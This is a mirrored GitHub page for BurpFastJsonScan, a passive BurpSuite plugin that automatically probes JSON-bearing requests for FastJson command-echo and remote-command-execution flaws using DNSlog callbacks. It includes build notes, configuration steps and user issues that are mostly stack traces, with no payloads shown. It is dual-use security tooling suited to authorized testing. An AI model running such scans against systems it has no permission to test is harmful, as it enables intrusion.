Coder Social home page Coder Social logo

burpfastjsonscan's Introduction

BurpFastJsonScan

一款基于BurpSuite的被动式FastJson检测插件

免责声明

该工具仅用于安全自查检测

由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许,不得善自使用本工具进行任何攻击活动,不得以任何方式将其用于商业目的。

简介

BurpFastJsonScan 一个希望能节省一些渗透时间好进行划水的扫描插件

该插件会对BurpSuite传进来的带有json数据的请求包进行检测

目前的功能如下

  • 命令回显
  • 远程命令执行

请注意!!!!

默认使用jdk1.8编译

默认使用jdk1.8编译

默认使用jdk1.8编译

默认使用jdk1.8编译

在最新版的burp2.x中jdk为1x,会导致插件不可用,请自行下载源码使用当前电脑的jdk1x进行编译,谢谢

在最新版的burp2.x中jdk为1x,会导致插件不可用,请自行下载源码使用当前电脑的jdk1x进行编译,谢谢

在最新版的burp2.x中jdk为1x,会导致插件不可用,请自行下载源码使用当前电脑的jdk1x进行编译,谢谢

在最新版的burp2.x中jdk为1x,会导致插件不可用,请自行下载源码使用当前电脑的jdk1x进行编译,谢谢

在最新版的burp2.x中jdk为1x,会导致插件不可用,请自行下载源码使用当前电脑的jdk1x进行编译,谢谢

在最新版的burp2.x中jdk为1x,会导致插件不可用,请自行下载源码使用当前电脑的jdk1x进行编译,谢谢

在最新版的burp2.x中jdk为1x,会导致插件不可用,请自行下载源码使用当前电脑的jdk1x进行编译,谢谢

在最新版的burp2.x中jdk为1x,会导致插件不可用,请自行下载源码使用当前电脑的jdk1x进行编译,谢谢

在最新版的burp2.x中jdk为1x,会导致插件不可用,请自行下载源码使用当前电脑的jdk1x进行编译,谢谢

在最新版的burp2.x中jdk为1x,会导致插件不可用,请自行下载源码使用当前电脑的jdk1x进行编译,谢谢

编译方法

编译方法

这是一个 java maven项目

默认java版本为 1.8

导入idea,打开刚刚好下载好的源码

打开: /BurpFastJsonScan/pom.xml 安装对应的包,第一次安装依赖包需要比较久,慢慢等不要急

编译文件地址: /BurpFastJsonScan/target/BurpFastJsonScan/

jar包地址: /BurpFastJsonScan/target/BurpFastJsonScan/BurpFastJsonScan.jar

项目配置文件地址: /BurpFastJsonScan/target/BurpFastJsonScan/resources/config.yml

接着拿着这个jar包, 导入BurpSuite即可

安装方法

这是一个 java maven项目

如果你想自己编译的话, 那就下载本源码自己编译成 jar包 然后进行导入BurpSuite

检测方法选择

目前有二种方法进行的检测

  • 命令回显
  • 远程命令执行

检测规则

  • POST 的内容为json
  • GET 的参数内容为json
  • POST 的参数内容为json
  • Cookie 的参数内容为json
例子:
GET, POST, Cookie 有个参数 json
json = {"aaa":"66666"}
那么就会去检测
json的这种就是请求包的内容直接就是json不带参数的那种, 也会去检测

使用方法

我们正常去访问网站, 如果站点的某个请求出现了 json 那么该插件就会去尝试检测

访问完毕以后, 插件就会自动去进行扫描

如果有结果那么插件就会在以下地方显示

  • Tag
  • Extender
  • Scanner-Issue activity

问题查看

目前有这几个地方可以查看

tag界面查看漏洞情况

现在可以通过tag界面查看漏洞情况了

分别会返回
- request no json =  请求没有json
- request json no eligible = 请求json不符合条件
- the number of website problems has exceeded = exceeded 超出网站问题的数量
- the number of website scans exceeded = 超出网站可扫描次数
- waiting for test results = 等待测试结果
- [+] found fastJson command execution = 查找到fastJson命令执行
- [-] not found fastJson command execution = 没有查找到fastJson命令执行
- [x] scan task timed out = 扫描任务超时
- [x] unknown error = 未知的错误

当发生 unknown error 的时候,可以尝试在下方中查看错误详情

疑难杂症解决

假如扫描出问题了,想要重新扫描怎么办?

例如tag一直出现如下问题:

  • the number of website problems has exceeded = exceeded 超出网站问题的数量
  • the number of website scans exceeded = 超出网站可扫描次数

解决方案:

如何切换dnslog的问题

编译完毕以后,进入BurpFastJsonScan文件夹,进入resources目录,打开config.yml

如下:

如果是想换成 DnsLogCn/BurpDnsLog 的话,只需要替换 provider这个值为对应的即可

如果想使用Ceye,那就需要如下操作:

获取token与Identifier

然后打开config.yml,填写成如下样子,如何重新安装插件即可:

burpfastjsonscan's People

Contributors

pmiaowu avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

sry309 bravery9 m09ic ccqtv123 killvxk qmf0c3uk crackercat nusiloot gayhub-blackerie g0dark rassec kakakpy huangzccn hackerxj007 pengtao007 icysun leeasina 1f3lse gaozzr sec-nux want2live233 gkfnf chuanwei liutufang gh0st0ne 0neatsec cts2021 margular weicheng19 netcat88212 actorexpose li8u99 graspkey popmedd jeromeyoung lili-ux 5l1v3r1 xdreamseeker ice-001 re13orn jacsonypro eagleatman secd0g rabbitsafe laowang1026 phuong39 invoke888 0x24bin h4ckforjob 87993xiaojiang t1ger7 alex123-2star lyrhy taomamba 549083491 kaaaboom uunoob fubulizhi29 afwu 614074223liuyi cuteghost6 tk-t0n0y takeoverflo wang0098 m3g4byt3 gysf666 abcsd478 dirtypipe lanbai-2022 hirak0 s3rmvc none-team biglizi775 7973463 nu1l1 n0mi99 git-stateless patrickstarwow ksrconeksrcone gq1378 1in9e klinklinklin istoliving atomxw ofalwl ffpepwowa sylviagaytaneh2021 nanaao jsdysq explore-c qjlong pythonjwm fostane 30579096 nevermo0re imemaker lovelytoo 20200629 simplehang lztcode

burpfastjsonscan's Issues

插件曝出异常,麻烦喵呜大佬了,3Q~~~

最新几个版本不论是自己打包还是直接下载的都爆了这个异常。BurpSuite 用了2022.3.7/2022.3.8和2020.8.1 测试都有这个问题【本地jdk:java version "11.0.15.1"】,麻烦大佬看看了~~~~,阿里嘎多~~~
========�������-δ֪����============
java.lang.reflect.InvocationTargetException
at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:490)
at burp.DnsLogModule.DnsLog.(DnsLog.java:19)
at burp.BurpExtender.remoteCmdExtension(BurpExtender.java:314)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:181)
at burp.adf.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
at java.base/java.lang.Thread.run(Thread.java:834)
Caused by: com.github.kevinsawicki.http.HttpRequest$HttpRequestException: java.net.SocketTimeoutException: Read timed out
at com.github.kevinsawicki.http.HttpRequest.code(HttpRequest.java:1562)
at burp.DnsLogModule.ExtensionMethod.DnsLogCn.init(DnsLogCn.java:41)
at burp.DnsLogModule.ExtensionMethod.DnsLogCn.(DnsLogCn.java:25)
... 13 more
Caused by: java.net.SocketTimeoutException: Read timed out
at java.base/java.net.SocketInputStream.socketRead0(Native Method)
at java.base/java.net.SocketInputStream.socketRead(SocketInputStream.java:115)
at java.base/java.net.SocketInputStream.read(SocketInputStream.java:168)
at java.base/java.net.SocketInputStream.read(SocketInputStream.java:140)
at java.base/java.io.BufferedInputStream.fill(BufferedInputStream.java:252)
at java.base/java.io.BufferedInputStream.read1(BufferedInputStream.java:292)
at java.base/java.io.BufferedInputStream.read(BufferedInputStream.java:351)
at java.base/sun.net.www.http.HttpClient.parseHTTPHeader(HttpClient.java:746)
at java.base/sun.net.www.http.HttpClient.parseHTTP(HttpClient.java:689)
at java.base/sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1615)
at java.base/sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1520)
at java.base/java.net.HttpURLConnection.getResponseCode(HttpURLConnection.java:527)
at com.github.kevinsawicki.http.HttpRequest.code(HttpRequest.java:1560)
... 15 more

报错怎么解决的

========插件错误-未知错误============
java.lang.reflect.InvocationTargetException
at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
at sun.reflect.NativeConstructorAccessorImpl.newInstance(Unknown Source)
at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(Unknown Source)
at java.lang.reflect.Constructor.newInstance(Unknown Source)
at burp.Application.CmdEchoExtension.CmdEcho.init(CmdEcho.java:56)
at burp.Application.CmdEchoExtension.CmdEcho.(CmdEcho.java:35)
at burp.BurpExtender.cmdEchoExtension(BurpExtender.java:274)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:174)
at burp.f5p.run(Unknown Source)
at java.util.concurrent.Executors$RunnableAdapter.call(Unknown Source)
at java.util.concurrent.FutureTask.run(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Caused by: java.lang.NullPointerException: Response cannot be null
at burp.c6r.analyzeResponse(Unknown Source)
at burp.e3m.analyzeResponse(Unknown Source)
at burp.Application.CmdEchoExtension.ExtensionMethod.CmdEchoScan.cmdEchoDetection(CmdEchoScan.java:96)
at burp.Application.CmdEchoExtension.ExtensionMethod.CmdEchoScan.runExtension(CmdEchoScan.java:73)
at burp.Application.CmdEchoExtension.ExtensionMethod.CmdEchoScan.(CmdEchoScan.java:55)
... 14 more
java.lang.NullPointerException: Response cannot be null
at burp.c6r.analyzeResponse(Unknown Source)
at burp.e3m.analyzeResponse(Unknown Source)
at burp.Application.CmdEchoExtension.ExtensionMethod.CmdEchoScan.cmdEchoDetection(CmdEchoScan.java:96)
at burp.Application.CmdEchoExtension.ExtensionMethod.CmdEchoScan.runExtension(CmdEchoScan.java:73)
at burp.Application.CmdEchoExtension.ExtensionMethod.CmdEchoScan.(CmdEchoScan.java:55)
at sun.reflect.GeneratedConstructorAccessor61.newInstance(Unknown Source)
at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(Unknown Source)
at java.lang.reflect.Constructor.newInstance(Unknown Source)
at burp.Application.CmdEchoExtension.CmdEcho.init(CmdEcho.java:56)
at burp.Application.CmdEchoExtension.CmdEcho.(CmdEcho.java:35)
at burp.BurpExtender.cmdEchoExtension(BurpExtender.java:274)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:174)
at burp.f5p.run(Unknown Source)
at java.util.concurrent.Executors$RunnableAdapter.call(Unknown Source)
at java.util.concurrent.FutureTask.run(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)

JDK11提示加载成功,但是还是爆了一堆错误,会影响扫描吗

JDK11提示加载成功,但是还是爆了一堆错误,会影响扫描吗,同一个环境,隔壁同事可以扫出来,我这个就不行。。。。。。
不知道哪儿的问题。
image
image

java.lang.NullPointerException
	at burp.aii.T(Unknown Source)
	at burp.cnn.getHttpService(Unknown Source)
	at burp.gvg.getHttpService(Unknown Source)
	at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:128)
	at burp.bpc.a(Unknown Source)
	at burp.fno.a(Unknown Source)
	at burp.dt2.a(Unknown Source)
	at burp.dt2.a(Unknown Source)
	at burp.jf.a(Unknown Source)
	at burp.guy.a(Unknown Source)
	at burp.dc4.b(Unknown Source)
	at burp.jf.addNotify(Unknown Source)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addImpl(Container.java:1146)
	at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:730)
	at burp.cd6.a(Unknown Source)
	at burp.cd6.insertTab(Unknown Source)
	at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:804)
	at burp.bxg.a(Unknown Source)
	at burp.guy.c(Unknown Source)
	at burp.guy.lambda$extensionConfigChanged$5(Unknown Source)
	at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313)
	at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
	at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
	at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
	at java.base/java.security.AccessController.doPrivileged(Native Method)
	at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
	at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
	at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
	at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
	at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
	at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
	at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
	at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.NullPointerException
	at burp.aii.T(Unknown Source)
	at burp.cnn.getHttpService(Unknown Source)
	at burp.gvg.getHttpService(Unknown Source)
	at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:128)
	at burp.bpc.a(Unknown Source)
	at burp.fno.a(Unknown Source)
	at burp.dt2.a(Unknown Source)
	at burp.dt2.a(Unknown Source)
	at burp.jf.a(Unknown Source)
	at burp.guy.a(Unknown Source)
	at burp.dc4.b(Unknown Source)
	at burp.jf.addNotify(Unknown Source)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addNotify(Container.java:2800)
	at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
	at java.desktop/java.awt.Container.addImpl(Container.java:1146)
	at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:730)
	at burp.cd6.a(Unknown Source)
	at burp.cd6.insertTab(Unknown Source)
	at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:804)
	at burp.bxg.a(Unknown Source)
	at burp.guy.c(Unknown Source)
	at burp.guy.lambda$extensionConfigChanged$5(Unknown Source)
	at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313)
	at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
	at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
	at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
	at java.base/java.security.AccessController.doPrivileged(Native Method)
	at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
	at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
	at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
	at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
	at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
	at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
	at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
	at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)

1.8+2020.2.1版本加载后报错

你好,多有打扰,之前使用的14版本的jdk加载新版本的burp一直有问题,今天尝试使用java1.8.0版本运行burp2020.2.1版本,然后从release里面下载的1.8版本的插件,加载后还是报错,因为不太了解java,也不知道是哪里出了问题。
以下的报错代码
java.lang.NullPointerException at burp.ab1.a(Unknown Source) at burp.en6.getHttpService(Unknown Source) at burp.fcp.getHttpService(Unknown Source) at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:151) at burp.dbg.b(Unknown Source) at burp.exj.b(Unknown Source) at burp.exj.a(Unknown Source) at burp.ax_.b(Unknown Source) at burp.bht.a(Unknown Source) at burp.exj.addNotify(Unknown Source) at java.awt.Container.addNotify(Container.java:2776) at javax.swing.JComponent.addNotify(JComponent.java:4740) at java.awt.Container.addNotify(Container.java:2776) at javax.swing.JComponent.addNotify(JComponent.java:4740) at java.awt.Container.addNotify(Container.java:2776) at javax.swing.JComponent.addNotify(JComponent.java:4740) at java.awt.Container.addNotify(Container.java:2776) at javax.swing.JComponent.addNotify(JComponent.java:4740) at java.awt.Container.addNotify(Container.java:2776) at javax.swing.JComponent.addNotify(JComponent.java:4740) at java.awt.Container.addImpl(Container.java:1124) at javax.swing.JTabbedPane.insertTab(JTabbedPane.java:724) at burp.exs.a(Unknown Source) at burp.exs.insertTab(Unknown Source) at javax.swing.JTabbedPane.addTab(JTabbedPane.java:798) at burp.dje.a(Unknown Source) at burp.ax_.a(Unknown Source) at burp.ax_.lambda$extensionConfigChanged$4(Unknown Source) at java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:311) at java.awt.EventQueue.dispatchEventImpl(EventQueue.java:758) at java.awt.EventQueue.access$500(EventQueue.java:97) at java.awt.EventQueue$3.run(EventQueue.java:709) at java.awt.EventQueue$3.run(EventQueue.java:703) at java.security.AccessController.doPrivileged(Native Method) at java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:74) at java.awt.EventQueue.dispatchEvent(EventQueue.java:728) at java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:205) at java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:116) at java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:105) at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101) at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:93) at java.awt.EventDispatchThread.run(EventDispatchThread.java:82) java.lang.NullPointerException at burp.ab1.a(Unknown Source) at burp.en6.getHttpService(Unknown Source) at burp.fcp.getHttpService(Unknown Source) at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:151) at burp.dbg.b(Unknown Source) at burp.exj.b(Unknown Source) at burp.exj.a(Unknown Source) at burp.ax_.b(Unknown Source) at burp.bht.a(Unknown Source) at burp.exj.addNotify(Unknown Source) at java.awt.Container.addNotify(Container.java:2776) at javax.swing.JComponent.addNotify(JComponent.java:4740) at java.awt.Container.addNotify(Container.java:2776) at javax.swing.JComponent.addNotify(JComponent.java:4740) at java.awt.Container.addNotify(Container.java:2776) at javax.swing.JComponent.addNotify(JComponent.java:4740) at java.awt.Container.addNotify(Container.java:2776) at javax.swing.JComponent.addNotify(JComponent.java:4740) at java.awt.Container.addNotify(Container.java:2776) at javax.swing.JComponent.addNotify(JComponent.java:4740) at java.awt.Container.addImpl(Container.java:1124) at javax.swing.JTabbedPane.insertTab(JTabbedPane.java:724) at burp.exs.a(Unknown Source) at burp.exs.insertTab(Unknown Source) at javax.swing.JTabbedPane.addTab(JTabbedPane.java:798) at burp.dje.a(Unknown Source) at burp.ax_.a(Unknown Source) at burp.ax_.lambda$extensionConfigChanged$4(Unknown Source) at java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:311) at java.awt.EventQueue.dispatchEventImpl(EventQueue.java:758) at java.awt.EventQueue.access$500(EventQueue.java:97) at java.awt.EventQueue$3.run(EventQueue.java:709) at java.awt.EventQueue$3.run(EventQueue.java:703) at java.security.AccessController.doPrivileged(Native Method) at java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:74) at java.awt.EventQueue.dispatchEvent(EventQueue.java:728) at java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:205) at java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:116) at java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:105) at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101) at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:93) at java.awt.EventDispatchThread.run(EventDispatchThread.java:82)

大佬,提个需求

一直用大佬的三个插件,fastjson、shiro、log4j的,因为是被动扫描,会对所有经过burp的请求进行被动扫描,在测试网站的时候,一般都会把待测网站添加scope中,这三个插件可以添加一个配置选项么,仅测试scope中的,参考:
image

需求

大佬能否增加个排序功能,可以在扫描列表最上面展示最新的扫描任务

需求添加请求

师傅好,我尝试使用你提供的fastjson工具,在测试过程中发现该工具没有右键重发数据包的功能,针对一些特殊场景,例如需要手动修改content-type为json之类的可能有点不方便,不知道能否添加该功能呢?

at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:716) 报错

at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:716)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:399)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:86)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:741)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.cus.W(Unknown Source)
at burp.g4d.getHttpService(Unknown Source)
at burp.g1f.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:128)
at burp.ace.a(Unknown Source)
at burp.h1j.a(Unknown Source)
at burp.ina.a(Unknown Source)
at burp.ina.a(Unknown Source)
at burp.fdg.a(Unknown Source)
at burp.b9n.a(Unknown Source)
at burp.c8l.b(Unknown Source)
at burp.fdg.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addImpl(Container.java:1150)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:756)
at burp.r3.a(Unknown Source)
at burp.r3.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:830)
at burp.dn1.a(Unknown Source)
at burp.b9n.c(Unknown Source)
at burp.b9n.a(Unknown Source)
at burp.g9b.a(Unknown Source)
at burp.a2e.addSuiteTab(Unknown Source)
at burp.bav.addSuiteTab(Unknown Source)
at burp.i0_.addSuiteTab(Unknown Source)
at burp.Tags$1.run(Tags.java:71)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:318)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:771)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:722)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:716)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:399)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:86)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:741)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.cus.W(Unknown Source)
at burp.g4d.getHttpService(Unknown Source)
at burp.g1f.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:128)
at burp.ace.a(Unknown Source)
at burp.h1j.a(Unknown Source)
at burp.ina.a(Unknown Source)
at burp.ina.a(Unknown Source)
at burp.fdg.a(Unknown Source)
at burp.b9n.a(Unknown Source)
at burp.c8l.b(Unknown Source)
at burp.fdg.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addNotify(Container.java:2804)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4839)
at java.desktop/java.awt.Container.addImpl(Container.java:1150)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:756)
at burp.r3.a(Unknown Source)
at burp.r3.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:830)
at burp.dn1.a(Unknown Source)
at burp.b9n.c(Unknown Source)
at burp.b9n.lambda$extensionConfigChanged$5(Unknown Source)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:318)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:771)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:722)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:716)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:399)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:86)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:741)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.cus.W(Unknown Source)
at burp.g4d.getHttpService(Unknown Source)
at burp.g1f.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:128)
at burp.ace.a(Unknown Source)
at burp.h1j.a(Unknown Source)
at burp.ina.a(Unknown Source)
at burp.ina.a(Unknown Source)
at burp.fdg.a(Unknown Source)
at burp.b9n.a(Unknown Source)
at burp.c8l.b(Unknown Source)
